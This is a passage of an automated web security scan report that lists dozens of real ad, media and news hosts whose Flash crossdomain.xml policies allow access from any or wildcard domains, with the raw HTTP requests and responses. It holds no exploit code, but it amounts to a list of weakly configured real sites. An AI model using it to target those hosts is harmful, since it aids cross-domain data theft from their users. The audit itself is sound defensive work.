<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...

7.81. http://server3.yowindow.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://server3.yowindow.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: server3.yowindow.com
Proxy-Connection: keep-alive
Referer: http://swf.yowindow.com/wimo/hpPal/hpPal.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:31:15 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.9 with Suhosin-Patch mod_perl/2.0.3 Perl/v5.8.8
Last-Modified: Fri, 01 Jan 2010 20:30:06 GMT
ETag: "18c223-13a-47c203cb2ef80"
Accept-Ranges: bytes
Content-Length: 314
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*" />
...[SNIP]...

7.82. http://shadow01.yumenetworks.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shadow01.yumenetworks.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: shadow01.yumenetworks.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:05:07 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 DAV/2
Last-Modified: Fri, 12 Mar 2010 23:37:01 GMT
ETag: "12a8464-122-481a3020e8140"
Accept-Ranges: bytes
Content-Length: 290
P3P: policyref="http://qa-web-001.sjc1.yumenetworks.com/P3P/PolicyReferences.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Access-Control-Allow-Origin: *
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allo
...[SNIP]...

7.83. http://social.ndtv.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://social.ndtv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: social.ndtv.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: application/xml
ETag: "40c670-f7-47908ef2325a7"
Last-Modified: Mon, 23 Nov 2009 12:26:25 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
Content-Length: 247
Cache-Control: max-age=1003924
Expires: Thu, 15 Sep 2011 17:35:05 GMT
Date: Sun, 04 Sep 2011 02:43:01 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="*.vdopia.com" />
...[SNIP]...

7.84. http://srv.clickfuse.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://srv.clickfuse.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: srv.clickfuse.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/xml
Date: Sun, 04 Sep 2011 03:59:22 GMT
ETag: "542c0-cb-4aaae79f56780"
Last-Modified: Wed, 17 Aug 2011 07:30:54 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 203
Connection: Close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

7.85. http://swf.yowindow.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://swf.yowindow.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: swf.yowindow.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:29:49 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.9 with Suhosin-Patch mod_perl/2.0.3 Perl/v5.8.8
Last-Modified: Fri, 01 Jan 2010 20:30:06 GMT
ETag: "18c223-13a-47c203cb2ef80"
Accept-Ranges: bytes
Content-Length: 314
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*" />
...[SNIP]...

7.86. http://sync.adap.tv/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sync.adap.tv
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: sync.adap.tv

Response

HTTP/1.0 200 OK
Content-Type: application/xml
Connection: close
Content-Length: 204

<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-polic
...[SNIP]...

7.87. http://sync.mathtag.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sync.mathtag.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: sync.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/cross-domain-policy
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x1 pid 0x24b1 9393
Set-Cookie: ts=1315103990; domain=.mathtag.com; path=/; expires=Mon, 03-Sep-2012 02:39:50 GMT
Connection: keep-alive
Content-Length: 215

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-
...[SNIP]...

7.88. http://t.mookie1.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://t.mookie1.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: t.mookie1.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:23:11 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Mon, 29 Aug 2011 15:56:28 GMT
ETag: "6b4c002-c9-4aba6f01a0300"
Accept-Ranges: bytes
Content-Length: 201
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

7.89. http://t4.liverail.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://t4.liverail.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: t4.liverail.com

Response

HTTP/1.0 200 OK
Content-Type: application/xml
Accept-Ranges: bytes
ETag: "1095638763"
Last-Modified: Mon, 22 Aug 2011 16:57:51 GMT
Content-Length: 269
Date: Sun, 04 Sep 2011 03:20:41 GMT
Server: lighttpd/1.4.28

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

7.90. http://tags.bluekai.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tags.bluekai.com

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 03:05:46 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 29 Jun 2011 21:44:06 GMT
ETag: "11003d9-ca-4a6e0af03f580"
Accept-Ranges: bytes
Content-Length: 202
Content-Type: text/xml
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" to-ports="*"/>
<site-control permitted-cross-domain-policies="all"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy
...[SNIP]...

7.91. http://trk.tidaltv.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.tidaltv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: trk.tidaltv.com

Response

HTTP/1.1 200 OK
Content-Length: 78
Content-Type: text/xml
Last-Modified: Mon, 15 Oct 2007 17:48:00 GMT
Accept-Ranges: bytes
ETag: "048e68653fc81:1dbc"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 03:21:32 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

7.92. http://uav.tidaltv.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://uav.tidaltv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: uav.tidaltv.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/xml
Date: Sun, 04 Sep 2011 03:22:06 GMT
ETag: "ffbb5223716cc1:2006"
Last-Modified: Thu, 19 May 2011 15:11:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 78
Connection: Close

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

7.93. http://unitus.synergy-e.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://unitus.synergy-e.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: unitus.synergy-e.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sun, 04 Sep 2011 02:25:06 GMT
Content-Type: text/xml
Connection: close
Last-Modified: Sun, 29 May 2011 01:58:20 GMT
ETag: "3430247-cb-4a460814d8700"
Accept-Ranges: bytes
Content-Length: 203

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

7.94. http://vast.bp3845006.btrll.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vast.bp3845006.btrll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: vast.bp3845006.btrll.com
Proxy-Connection: keep-alive
Referer: http://static.eplayer.performgroup.com/ptvFlash/eplayer2/Eplayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BR_MBBV=Ak5fqqZQd%2Fl1AQAWXfM; DRN1=AGPa-U7XtK4

Response

HTTP/1.1 200 OK
Connection: close
Content-Type: application/xml
Cache-Control: max-age=7776000
Date: Sun, 04 Sep 2011 03:18:51 GMT
Content-Length: 269

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

7.95. http://vod.l3.cms.performgroup.com:443/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vod.l3.cms.performgroup.com:443
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: vod.l3.cms.performgroup.com

Response

HTTP/1.0 200 OK
Pragma: no-cache
Content-Length: 187
Server: FlashCom/3.5.6
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8" ?>
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permitted-cross-domain-policies="master-only"/>
</cross-domain-policy>

7.96. http://vox-static.liverail.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vox-static.liverail.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: vox-static.liverail.com

Response

HTTP/1.0 200 OK
x-amz-id-2: X8oJxg+fk30nCcywFlZgZ8Fq9Gw49jv61zHjAGdXIHOfZXuCf0uBRu4/U5ooAdg1
x-amz-request-id: FB88C7CE42685648
x-amz-meta-s3fox-filesize: 274
x-amz-meta-s3fox-modifiedtime: 1267129495540
Last-Modified: Thu, 25 Feb 2010 20:27:58 GMT
ETag: "1f663267210f6e5843980e9159b0b9ae"
Content-Type: text/xml
Content-Length: 274
Server: AmazonS3
Date: Sun, 04 Sep 2011 02:37:48 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="mas
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

7.97. http://www.bangkokpost.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bangkokpost.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:24:59 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Sun, 17 Oct 2010 17:54:45 GMT
ETag: "173825a-130-c1432340"
Accept-Ranges: bytes
Content-Length: 304
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

7.98. http://www.burstnet.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.burstnet.com

Response

HTTP/1.0 200 OK
Server: Apache (Unix)
Last-Modified: Tue, 30 Aug 2011 17:47:53 GMT
ETag: "596a1b-66-4e5d2249"
Accept-Ranges: bytes
Content-Length: 102
Content-Type: text/xml
Date: Sun, 04 Sep 2011 10:59:01 GMT
Connection: close
Set-Cookie: 56Q8=CT; expires=Sun, 02-Oct-2011 10:59:01 GMT; path=/; domain=.www.burstnet.com
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.99. http://www.mtv.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mtv.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Last-Modified: Tue, 15 Apr 2008 20:18:17 GMT
ETag: "4b5484c-117-44aef19c7b440"
Accept-Ranges: bytes
Content-Length: 279
Content-Type: application/xml
Cache-Control: max-age=600
Date: Sun, 04 Sep 2011 04:40:14 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" secure="false" />
   <al
...[SNIP]...

7.100. http://www.ndtv.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ndtv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ndtv.com

Response

HTTP/1.0 200 OK
Last-Modified: Fri, 19 Feb 2010 09:21:27 GMT
ETag: "1293cce944b1ca1:15848"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cteonnt-Length: 344
Content-Type: text/xml
Cache-Control: max-age=498923
Date: Sun, 04 Sep 2011 02:32:12 GMT
Content-Length: 344
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
   <allow-access-from domain="*.vdopia.com" />
   <allow-access-from domain="*.yahoo.com" />
   <allow-access-from domain="m.*.yahoo.com" />
...[SNIP]...

7.101. http://www.nexac.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nexac.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nexac.com

Response

HTTP/1.0 200 OK
Connection: close
Expires: Wed Sep 15 09:14:42 MDT 2010
Pragma: no-cache
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "3835246478"
Last-Modified: Fri, 22 Jul 2011 16:11:25 GMT
Content-Length: 201
Date: Sun, 04 Sep 2011 11:00:41 GMT
Server: lighttpd/1.4.18

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

7.102. http://www.watchindia.tv/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchindia.tv
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.watchindia.tv

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/xml
Last-Modified: Tue, 02 Aug 2011 10:48:12 GMT
Accept-Ranges: bytes
ETag: "4481caac151cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 04:45:21 GMT
Connection: close
Content-Length: 220

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</
...[SNIP]...

7.103. http://www2.glam.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www2.glam.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www2.glam.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 16 Sep 2010 21:08:11 GMT
ETag: "1f70007-cc-49066d7f404c0"
Accept-Ranges: bytes
Content-Length: 204
Content-Type: text/xml
Date: Sun, 04 Sep 2011 11:04:37 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

7.104. http://www9.effectivemeasure.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www9.effectivemeasure.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www9.effectivemeasure.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.effectivemeasure.net/w3c/p3p.xml", CP="NOI DSP COR NID PSA ADM OUR IND UNI NAV COM"
Pragma: no-cache
Cache-Control: no-cache
Pragma-directive: no-cache
Cache-Directive: no-cache
Expires: 0
Content-Type: text/xml
Accept-Ranges: bytes
Last-Modified: Fri, 11 Mar 2011 04:05:00 GMT
Content-Length: 322
Connection: close
Date: Sun, 04 Sep 2011 02:25:06 GMT
Server: C10

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

7.105. http://xml.eplayer.performgroup.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://xml.eplayer.performgroup.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: xml.eplayer.performgroup.com
Proxy-Connection: keep-alive
Referer: http://static.eplayer.performgroup.com/ptvFlash/eplayer2/Eplayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/xml
Date: Sun, 04 Sep 2011 02:39:37 GMT
ETag: W/"344-1310422012000"
Last-Modified: Mon, 11 Jul 2011 22:06:52 GMT
Server: Apache-Coyote/1.1
Content-Length: 344
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

7.106. http://yads.zedo.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yads.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: yads.zedo.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:46:34 GMT
Server: ZEDO 3G
Last-Modified: Mon, 19 May 2008 09:07:04 GMT
ETag: "261cc26-f7-44d91afed3e00"
Accept-Ranges: bytes
Content-Length: 247
Edge-Control: dca=esi, !no-store
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

7.107. http://adadvisor.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adadvisor.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: adadvisor.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:24:03 GMT
Connection: close
Server: AAWebServer
P3P: policyref="http://www.adadvisor.net/w3c/p3p.xml",CP="NOI NID"
Content-Length: 478
Content-Type: Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="
...[SNIP]...
<allow-access-from domain="*.tubemogul.com" />
...[SNIP]...
<allow-access-from domain="*.adap.tv" />
...[SNIP]...
<allow-access-from domain="*.videoegg.com" />
...[SNIP]...
